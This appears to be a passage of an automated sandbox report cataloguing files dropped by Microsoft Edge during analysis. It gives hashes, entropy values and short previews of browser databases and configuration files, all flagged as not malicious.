                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:MANIFEST-000001.

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\CURRENT (copy)

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:MANIFEST-000001.

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform\auto_show_data.db\MANIFEST-000001

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:OpenPGP Secret Key
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):41
                                                                                                                                                                                  Entropy (8bit):4.704993772857998
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                  MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                  SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                  SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                  SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\000003.log

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):2164095
                                                                                                                                                                                  Entropy (8bit):5.223187384588804
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:24576:IbPMZpVFf0W1XguC5hrslmn+AypENU8ikYSbQbR2z:IbkZpVFfBbmbd
                                                                                                                                                                                  MD5:2321BA90F8D5755129AB8ED8122E5FB0
                                                                                                                                                                                  SHA1:E18B591E73E0020EFD33E7E4230E04789FCA56B8
                                                                                                                                                                                  SHA-256:B5F031C5539CFAA3C5C9122346929C9DA3B24E3A3AE5D2428FB49B1B18F02DF8
                                                                                                                                                                                  SHA-512:E41DD7780E4AAE19EA86A7473CE43C3A4555A5E309D75D75EF968213848D484243FE3C1BD8DEBF24DAC25D0E6C459593DA2953273933EBC2EB2FC2A81105A854
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:...m.................DB_VERSION.1.f.+.................QUERY_TIMESTAMP:arbitration_priority_list4.*.*.13340960289901340.$QUERY:arbitration_priority_list4.*.*..[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=NtPyTqjbjPElpw2mWa%2FwOk1no4JFJEK8%2BwO4xQdDJO4%3D&st=2021-01-01T00%3A00%3A00Z&se=2023-12-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"N0MkrPHaUyfTgQSPaiVpHemLMcVgqoPh/xUYLZyXayg=","size":11749}]...................'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.[{. "configVersion": 32,. "PrivilegedExperiences": [. "ShorelinePrivilegedExperienceID",. "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT",. "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND",. "SHOPPING_AUTO_SHOW_BING_SEARCH",. "SHOPPING_AUTO_SHOW_REBATES",. "SHOPPING_AUTO_SHOW_REBATES_CONFIRMATION",. "SHOPPING_AUTO_SHOW_REBATES_DEACTI

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):340
                                                                                                                                                                                  Entropy (8bit):5.053336476560602
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:6:rRWiyq2PN723oH+Tcwt9Eh1tIFUt8KRul11Zmw+KR899RkwON723oH+Tcwt9Eh1H:r7yvVaYeb9Eh16FUt8KG/+KuzR5OaYe8
                                                                                                                                                                                  MD5:2B8361B221384654539756FCB3180A95
                                                                                                                                                                                  SHA1:AB35427A48AFA845CA1DE45E96EF54AB9B2CE9DC
                                                                                                                                                                                  SHA-256:50F12D2C4AA1ED01FA879203E35656014B29B503D79A552B8D2191D4357A4E2F
                                                                                                                                                                                  SHA-512:46F451A66E0F959F6BB567D1B4DFF385B5B65F7CAC43B5F981A31E2A11ECD858A778DEC7AC2FD47409856B0B7ABD3A595E4FE5504A4CA0ADEFDD551A1DDCF51C
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:2024/02/21-12:30:26.402 30a0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/02/21-12:30:26.405 30a0 Recovering log #3.2024/02/21-12:30:26.869 30a0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db\LOG.old (copy)

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):340
                                                                                                                                                                                  Entropy (8bit):5.053336476560602
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:6:rRWiyq2PN723oH+Tcwt9Eh1tIFUt8KRul11Zmw+KR899RkwON723oH+Tcwt9Eh1H:r7yvVaYeb9Eh16FUt8KG/+KuzR5OaYe8
                                                                                                                                                                                  MD5:2B8361B221384654539756FCB3180A95
                                                                                                                                                                                  SHA1:AB35427A48AFA845CA1DE45E96EF54AB9B2CE9DC
                                                                                                                                                                                  SHA-256:50F12D2C4AA1ED01FA879203E35656014B29B503D79A552B8D2191D4357A4E2F
                                                                                                                                                                                  SHA-512:46F451A66E0F959F6BB567D1B4DFF385B5B65F7CAC43B5F981A31E2A11ECD858A778DEC7AC2FD47409856B0B7ABD3A595E4FE5504A4CA0ADEFDD551A1DDCF51C
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:2024/02/21-12:30:26.402 30a0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/02/21-12:30:26.405 30a0 Recovering log #3.2024/02/21-12:30:26.869 30a0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\000003.log

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):800837
                                                                                                                                                                                  Entropy (8bit):6.007974331872854
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:12288:3+k5cybl1CBO6T3PylHXac11tAmZ3FYVDGVFsvFSpNu375vUxfXOJbgIwUI+IhJ3:3uybl1WEHptAmZaYQFN3MeBgINkg8
                                                                                                                                                                                  MD5:9719E4E34235B7662DF263150CDF0B52
                                                                                                                                                                                  SHA1:22A8AA1E15A8972375CAE8C161B4D6AFDD3FF2D9
                                                                                                                                                                                  SHA-256:CFB4B8273480E1A8DF54118ACCB88CAF02434ABCC3441C3670B16E9FF37E66D2
                                                                                                                                                                                  SHA-512:55311B5A7D35CF357CAA3E032AC2979F73425785B1182BE731CE18BE1DE03C640571437A5BF3388368A2A6C251E4CD0D02C58076153B55B7B714FDDC127830E1
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:...m.................DB_VERSION.1`i...................BLOOM_FILTER:..0{"numberOfHashFunctions":8,"shiftBase":8,"bloomFilterArraySize":4753419,"primeBases":[5381,5381,5381,5381],"supportedDomains":"5eiUpv0RJiQN6jBRdq9Nos1sKYADLDvvKQg7QPyAZBKiLwMkRykyS6FaL/r/WZqdElPTumxuXXgJ4KOMxczTVEVjtFv8FFl/B0AzCkBXWN7nCy8xN7c4obD846rr6u777edqQXt4QtMY3fbne752vqOQFnvWSpabMmOMuD6eXGIJVe4xhPgSEgg6jY1L5BpHvLz3WL+xzJ1Nw8oCHSlXCSAauxpuXQqIDA8aaaLIQRg+P4AtZeGqOesAYWdGUDrBcLAn8tTvr97gbldT3z0xo13Z3WEUm0AM4FcwAyc0OsUhgGVB95yCYq0aRhpAgpY4TJw9VIn+3eleJX8/v9ZVormM/r6ITNKaH6r7IwCXEBbAAeATyOeVptCdbDzAKUFcOx/F8aBCGfTCCDzvdprWxoihcYxb6NCOI5hJmSDH8JDSUsFJn6NZj0bxpo1R47AHK9hqIPWfZqhDMjozjDHvXxCvY/4qf6cWbtyNWsovA8jb/ZQ/ilACdMRDMDNXNohCEBYZeh/RquA1Qzq0uCLC9qZU+CZXMTjkLgTvpklaqHHwaL7wmRgTAGj7bHvTY8ABDDxoIii8LJswRZOSB4sQm51GibvkG1RTPf/2vNuvq9eoUrTaP5LpynDy0CZ0NUY4kEAiQJwE0HzSL1AGrjIusYnciXXKdsFitfstwTgjoHNz562R+5prFtDT7hqRVS4+YvC7Psxer0yUmqzJOACbzDECDwo8b0BuGAS/dfpHcQJ6t3Dsur1lUFDEWiWScBiI9pcOWdBX0UKi1EKfksBYsDbE2bvjYLr1IGR

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons\coupons_data.db\000005.ldb

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):800777
                                                                                                                                                                                  Entropy (8bit):6.006986780319706
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:12288:M+k5Zybl1CYi6T3Py+HXack1t/m+3FIVD0DFsoFUpNu3m4vU2fX6JVgqwUIQIhJf:Mbybl1fVHkt/m++kBF33LKLgqB6gS
                                                                                                                                                                                  MD5:355C8BA56EF393E82FA820100BACB8BB
                                                                                                                                                                                  SHA1:09C9ADE69D4CB52126F76A71E0209ADBDDECAE06
                                                                                                                                                                                  SHA-256:A18F779C1D7CFA5B6CE89D3F6BF8E5BB5B4BC4D424E2D064B4F64B59A0A02187
                                                                                                                                                                                  SHA-512:B45F39DE5493390ECFC566AF6B4BD81C70445A6E2305D7CC33789B11EB0BC864A10C26CCFAC6C3393F45C4F4FED3555832F2F6B6255FB32C141523796ABBD3C8
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:....0BLOOM_FILTER:........{"numberOfHashFunctions":8,"shiftBase":8,"bloomFilterArraySize":4753419,"primeBases":[5381,5381,5381,5381],"supportedDomains":"5eiUpv0RJiQN6jBRdq9Nos1sKYADLDvvKQg7QPyAZBKiLwMkRykyS6FaL/r/WZqdElPTumxuXXgJ4KOMxczTVEVjtFv8FFl/B0AzCkBXWN7nCy8xN7c4obD846rr6u777edqQXt4QtMY3fbne752vqOQFnvWSpabMmOMuD6eXGIJVe4xhPgSEgg6jY1L5BpHvLz3WL+xzJ1Nw8oCHSlXCSAauxpuXQqIDA8aaaLIQRg+P4AtZeGqOesAYWdGUDrBcLAn8tTvr97gbldT3z0xo13Z3WEUm0AM4FcwAyc0OsUhgGVB95yCYq0aRhpAgpY4TJw9VIn+3eleJX8/v9ZVormM/r6ITNKaH6r7IwCXEBbAAeATyOeVptCdbDzAKUFcOx/F8aBCGfTCCDzvdprWxoihcYxb6NCOI5hJmSDH8JDSUsFJn6NZj0bxpo1R47AHK9hqIPWfZqhDMjozjDHvXxCvY/4qf6cWbtyNWsovA8jb/ZQ/ilACdMRDMDNXNohCEBYZeh/RquA1Qzq0uCLC9qZU+CZXMTjkLgTvpklaqHHwaL7wmRgTAGj7bHvTY8ABDDxoIii8LJswRZOSB4sQm51GibvkG1RTPf/2vNuvq9eoUrTaP5LpynDy0CZ0NUY4kEAiQJwE0HzSL1AGrjIusYnciXXKdsFitfstwTgjoHNz562R+5prFtDT7hqRVS4+YvC7Psxer0yUmqzJOACbzDECDwo8b0BuGAS/dfpHcQJ6t3Dsur1lUFDEWiWScBiI9pcOWdBX0UKi1EKfksBYsDbE2bvjYLr1IGRSmcBhOlc9WRJREJ98GsG2b7yaGDBqxKyAJVOC7OALNXO

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps (copy)

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):115717
                                                                                                                                                                                  Entropy (8bit):5.183660917461099
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                  MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                  SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                  SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                  SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_www.youtube.com_0.indexeddb.leveldb\000001.dbtmp

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:MANIFEST-000001.

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_www.youtube.com_0.indexeddb.leveldb\CURRENT (copy)

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:MANIFEST-000001.

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\IndexedDB\https_www.youtube.com_0.indexeddb.leveldb\MANIFEST-000001

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):23
                                                                                                                                                                                  Entropy (8bit):4.142914673354254
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:Fdb+4Ll:Zl
                                                                                                                                                                                  MD5:3FD11FF447C1EE23538DC4D9724427A3
                                                                                                                                                                                  SHA1:1335E6F71CC4E3CF7025233523B4760F8893E9C9
                                                                                                                                                                                  SHA-256:720A78803B84CBCC8EB204D5CF8EA6EE2F693BE0AB2124DDF2B81455DE02A3ED
                                                                                                                                                                                  SHA-512:10A3BD3813014EB6F8C2993182E1FA382D745372F8921519E1D25F70D76F08640E84CB8D0B554CCD329A6B4E6DE6872328650FEFA91F98C3C0CFC204899EE824
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:........idb_cmp1......

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\0bc8b659-84d2-492d-9cee-29a6df2cc00e.tmp

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:[]

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\34871ee1-1ec4-4d30-b478-92c4bf7e0deb.tmp

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):40
                                                                                                                                                                                  Entropy (8bit):4.1275671571169275
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                  MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                  SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                  SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                  SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\9cccaec5-c007-4ae5-84a1-cbe2d2bf993a.tmp

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:[]

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 9, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 9
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                  Entropy (8bit):2.090131332935168
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:96:ige+AGJjre8R3uWhnYuxiOKg71DmMXDh+MJ2MHAB8r0di55ODE:igZVVlLR9+MAMgB8rP
                                                                                                                                                                                  MD5:175FE6310DDCDAB8A57AEBF9CEEBC0F1
                                                                                                                                                                                  SHA1:D396E6ECE7B2880F5A03DC6A95C8E7D0363D850B
                                                                                                                                                                                  SHA-256:AA53EB01C8AAE12C935BFE28BFCB7462E72AE5A8F8DE14BDF5F1BA22B2735A6E
                                                                                                                                                                                  SHA-512:94B6DA4C470CC8BAD88FF727761509045287D9F209059886DC30358027DE2DC3C6E3FDAF3E268FFD4B03E351BC14BCAEA8F611CE266D4584EC0DE9E67E506251
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports (copy)

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:[]

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF47f3e.TMP (copy)

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):2
                                                                                                                                                                                  Entropy (8bit):1.0
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:H:H
                                                                                                                                                                                  MD5:D751713988987E9331980363E24189CE
                                                                                                                                                                                  SHA1:97D170E1550EEE4AFC0AF065B78CDA302A97674C
                                                                                                                                                                                  SHA-256:4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
                                                                                                                                                                                  SHA-512:B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:[]

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries (copy)

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):40
                                                                                                                                                                                  Entropy (8bit):4.1275671571169275
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:3:Y2ktGMxkAXWMSN:Y2xFMSN
                                                                                                                                                                                  MD5:20D4B8FA017A12A108C87F540836E250
                                                                                                                                                                                  SHA1:1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
                                                                                                                                                                                  SHA-256:6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
                                                                                                                                                                                  SHA-512:507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                  Preview:{"SDCH":{"dictionaries":{},"version":2}}

                                                                                                                                                                                  C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences (copy)

                                                                                                                                                                                  Download File
                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                  Size (bytes):9814
                                                                                                                                                                                  Entropy (8bit):5.1110850546346915
                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                  SSDEEP:192:st+SkdPKCs/13aFvrE9kgD3+M8WvbV+Fd4AQUIpKJxUHhPcYJ:st+SIKCs/13CDGS0vbGdXQUCKJSHj
                                                                                                                                                                                  MD5:5F421375843091990F3F9C0096861E8A
                                                                                                                                                                                  SHA1:819E4C5D0ACE858B039CCB3A6E3278BF1CA34262
                                                                                                                                                                                  SHA-256:B84C01CC68EF42FA433B3007FAC39A409565B727AAB602D755438537DE6CF421
                                                                                                                                                                                  SHA-512:36DAE27BA07F4FBF43468C1FB08EC0DC197341335190047A84553D144C22619E870904C262F7C63B45C03F0ACE87F9469BD663013566FE7F734F518396BA073D
                                                                                                                                                                                  Malicious:false
